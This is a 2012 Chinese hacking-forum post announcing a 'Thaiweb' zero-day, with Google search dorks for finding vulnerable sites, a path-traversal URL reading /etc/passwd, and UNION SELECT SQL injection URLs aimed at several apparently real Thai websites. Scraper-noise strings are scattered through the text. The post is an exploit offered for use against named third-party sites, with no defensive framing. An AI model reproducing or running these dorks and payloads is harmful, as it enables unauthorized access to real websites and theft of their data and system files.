找回密码
 立即注册
查看: 2788|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
% u# ?+ f: M; b) w: a/ f5 R0 t. }7 d* }: C
intext:powered by Thaiweb
  `* P0 O/ I  v/ O
# @9 V: k2 a' b4 W& cinurl:index.php?page=board.php
5 Y+ ]- h. s4 c* ?0 W, ?4 i$ o; e2 k* K- p& U8 A8 W
. o  P& F1 H8 z
9 M4 v+ v6 H/ [3 M9 Y
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
0 M% m" [1 _3 c  O( E( x, n- j2 B, C% \0 ~* |. a
  p5 ?4 C, a" |/ p. V2 R* V

* n0 f  X1 e) ~! `: k0 Q9 ^% J利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'  o+ X. H0 U" ~0 F
4 Q- k+ ?/ t' ]& \
/ I  ~' n: U8 Q4 |$ c
( V" {/ h4 m' Q0 M8 |
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--+ _( Y: g# X0 x! I. E0 `

; H  |; j. }( `http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
, g" a' z9 u7 M0 x- Y( `$ j ! y/ r4 ~! f9 u* P
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# `- E  b5 |& Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表